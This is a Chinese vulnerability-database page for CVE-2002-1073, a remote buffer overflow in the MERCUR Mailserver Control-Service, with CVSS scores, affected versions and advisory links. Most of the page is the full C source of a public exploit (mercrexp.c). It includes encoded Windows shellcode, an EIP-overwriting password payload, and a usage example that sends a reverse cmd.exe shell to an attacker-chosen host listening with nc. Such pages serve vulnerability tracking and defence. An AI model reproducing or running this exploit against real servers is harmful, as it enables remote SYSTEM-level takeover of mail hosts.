CVE-2002-1073
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:42
NMCOES    

[原文]Buffer overflow in the control service for MERCUR Mailserver 4.2 allows remote attackers to execute arbitrary code via a long password.


[CNNVD]MERCUR Mailserver Control-Service远程缓冲区溢出漏洞(CNNVD-200210-168)

        
        MERCUR Mailserver是一款适合中小型企业使用的邮件服务程序,其中默认安装Control-Service监听TCP 32000端口。
        MERCUR Mailserver的Control-Service组件对用户提交的口令数据缺少正确的边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        MERCUR Mailserver的Control-Service组件包含用户验证机制,不过对用户提交的数据缺少正确的检查,攻击者可以提交包含超过260字节的字符串数据作为用户口令传递给Control-Service组件处理,可导致Control-Service组件产生缓冲区溢出,精心构建提交的用户密码数据可以使攻击者以Mailserver的进程在系统中执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:atrium_software:mercur_mailserver:3.3_sp2
cpe:/a:atrium_software:mercur_mailserver:3.3_sp1
cpe:/a:atrium_software:mercur_mailserver:4.1
cpe:/a:atrium_software:mercur_mailserver:4.1_sp1
cpe:/a:atrium_software:mercur_mailserver:3.3
cpe:/a:atrium_software:mercur_mailserver:4.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1073
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1073
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-168
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/9618.php
(VENDOR_ADVISORY)  XF  mercur-control-service-bo(9618)
http://www.securityfocus.com/bid/5261
(VENDOR_ADVISORY)  BID  5261
http://archives.neohapsis.com/archives/bugtraq/2002-07/0195.html
(UNKNOWN)  BUGTRAQ  20020717 MERCUR Mailserver advisory/remote exploit

- 漏洞信息

MERCUR Mailserver Control-Service远程缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        MERCUR Mailserver是一款适合中小型企业使用的邮件服务程序,其中默认安装Control-Service监听TCP 32000端口。
        MERCUR Mailserver的Control-Service组件对用户提交的口令数据缺少正确的边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        MERCUR Mailserver的Control-Service组件包含用户验证机制,不过对用户提交的数据缺少正确的检查,攻击者可以提交包含超过260字节的字符串数据作为用户口令传递给Control-Service组件处理,可导致Control-Service组件产生缓冲区溢出,精心构建提交的用户密码数据可以使攻击者以Mailserver的进程在系统中执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Atrium Software
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.atrium-software.com/mercur/mercur_e.html

- 漏洞信息 (21626)

3.3/4.0/4.2 MERCUR Mailserver Control-Service Buffer Overflow (EDBID:21626)
windows remote
2002-07-16 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/5261/info

MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver. 

/*
	mercrexp.c (7/16/2002)

	# ./mercrexp 192.168.0.2 32000 192.168.1.2 3333
	# nc -l -p 3333
	Microsoft Windows 2000 [Version 5.00.2195]
	(C) Copyright 1985-2000 Microsoft Corp.
	
	E:\WINNT\system32>	

	2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)	
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>

// CALL EBX; mcrctrl.exe@0x228e
#define EIP "\x8e\x2c\x40\x00"

// payload.. dumped into remote memory as failed 'username'
// dark spyrit's shell, ripped from jill.c
unsigned char shell[] =
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90"
		"\x90\x90\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95"
		"\x40\xe2\xfa\x2d\x95\x95\x64\xe2\x14\xad\xd8\xcf\x05\x95"
		"\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95\xc8\x1e\x40\x14"
		"\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
		"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3"
		"\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66"
		"\x33\xe1\x9d\xcc\xca\x16\x52\x91\xd0\x77\x72\xcc\xca\xcb"
		"\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6\x5c\xf3"
		"\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95"
		"\x96\x56\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d"
		"\xe1\x94\x95\x95\xa6\x55\x39\x10\x55\xe0\x6c\xc7\xc3\x6a"
		"\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95\x7d\xce\x94\x95"
		"\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
		"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5"
		"\x18\xd2\x85\xc5\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18"
		"\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18\xd2\x89\xc5\x6a\xc2\x55"
		"\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a\xc2\x51"
		"\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2"
		"\xcd\x14\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95"
		"\x18\xd2\xe5\xc5\x18\xd2\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff"
		"\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14\x78\xd5\x6b\x6a"
		"\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
		"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45"
		"\x1e\x7d\xc5\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a"
		"\x10\x3f\x95\x95\x95\xa6\x55\xc5\xd5\xc5\xd5\xc5\x6a\xc2"
		"\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d\xf3\x52"
		"\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d"
		"\x95\x94\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a"
		"\xc2\x49\xa6\x5c\xc4\xc3\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2"
		"\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15\xab\x95\xe1\xba"
		"\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
		"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff"
		"\x95\x6a\xa3\xc0\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05"
		"\x05\x05\x05\x7e\x27\xff\x95\xfd\x95\x91\x95\x95\xc0\xc6"
		"\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1\x09\xff"
		"\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2"
		"\x49\x7e\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55"
		"\x39\x10\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e"
		"\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
		"\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
		"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95"
		"\xd2\xf0\xe1\xc6\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa"
		"\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6"
		"\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1\xc5\xfc"
		"\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6"
		"\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4"
		"\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed"
		"\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9\xfa\xe6"
		"\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
		"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6"
		"\xfa\xf6\xfe\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6"
		"\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0"
		"\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb\xf0\xed"
		"\xf0\x95\x0a";

// fake user
unsigned char user[] = "\x78\x78\x78\x78\x0a";

// ebp/eip overwrite
unsigned char passwd[] =
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
		"\x90\x90\x90\x03\xde\x83\xc3\x02\xff\xd3\xc3\x10"EIP""
		"\x0a";

main(char argc, char **argv){
        int fd;
        int bufsize = 1024;
        int buffer = malloc(bufsize);
        unsigned short int      a_port;
        unsigned long           a_host;
        struct sockaddr_in sin;
        struct hostent *he;
        struct in_addr in;

	printf("MERCUR Mailserver 4.2.0.0 remote 'SYSTEM' level exploit (07/16/2002)\n");
        printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)\n\n");

        if (argc < 5){
                printf("usage: %s <targethost> <controlport> <localhost> <localport>\n", argv[0]);
                printf("	controlport: MERCUR Control-Service port (default 32000)\n\n");
		printf("NOTE: tested against win2k and winxp pro..\n\n");
                exit(-1);
        }

	// riiiiiiip
        a_port  = htons(atoi(argv[4]));
        a_port ^= 0x9595;
        if ((he = gethostbyname(argv[3])) == 0){herror(argv[3]);exit(-1);}
        a_host  = *((unsigned long *)he->h_addr);
        a_host ^= 0x95959595;
        shell[1113] = ((a_port) & 0xff);
        shell[1114] = ((a_port >> 8) & 0xff);        
        shell[1118] = ((a_host) & 0xff);
        shell[1119] = ((a_host >> 8) & 0xff);
        shell[1120] = ((a_host >> 16) & 0xff);
        shell[1121] = ((a_host >> 24) & 0xff);

        if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

        if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}
        else
        if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));
        sin.sin_port = htons(atoi(argv[2]));

	printf("ret: 0x00402c8e (mrcctrl.exe v.4.2.1.0)\n\n");
 
        printf("connecting to tcp port %s...\n", argv[2]);
        if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}
 
        printf("connected.\n\n");
 	sleep(1);
	printf("dumping payload...");
        if(write(fd, shell, strlen(shell)) < strlen(shell)){perror("write error");exit(-1);}
	printf("done\n");
        sleep(1);
        printf("sending fake login...");
        if(write(fd, user, strlen(user)) < strlen(user)){perror("write error");exit(-1);}
        printf("done\n");
	sleep(1);
	printf("eip overrun...");
	if(write(fd, passwd, strlen(passwd)) < strlen(passwd)){perror("write error");exit(-1);}
	printf("done\n\n");

	printf("cmd.exe spawned to [%s:%s]\n\n", argv[3], argv[4]);

        close(fd);

}

		

- 漏洞信息

14488
MERCUR Mailserver Control Service Password Field Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-07-18 Unknow
2002-07-18 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

MERCUR Mailserver Control-Service Buffer Overflow Vulnerability
Boundary Condition Error 5261
Yes No
2002-07-18 12:00:00 2009-07-11 02:56:00
Discovery of this issue is credited to 2c79cbe14ac7d0b8472d3f129fa1df <c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com>.

- 受影响的程序版本

Atrium Software MERCUR Mailserver 4.2
Atrium Software MERCUR Mailserver 4.0 1 SP1
Atrium Software MERCUR Mailserver 4.0 1
Atrium Software MERCUR Mailserver 3.3 SP2
Atrium Software MERCUR Mailserver 3.3 SP1
Atrium Software MERCUR Mailserver 3.3

- 漏洞讨论

MERCUR Mailserver is prone to a remotely exploitable buffer overflow condition. The condition is due to insufficient bounds checking in the Control-Service component, which listens on TCP port 32000 by default. It is possible to corrupt process memory by supplying an overly long username/password. Attackers may exploit this condition to execute arbitrary instructions with the privileges of the mailserver.

- 漏洞利用

The following exploit was provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站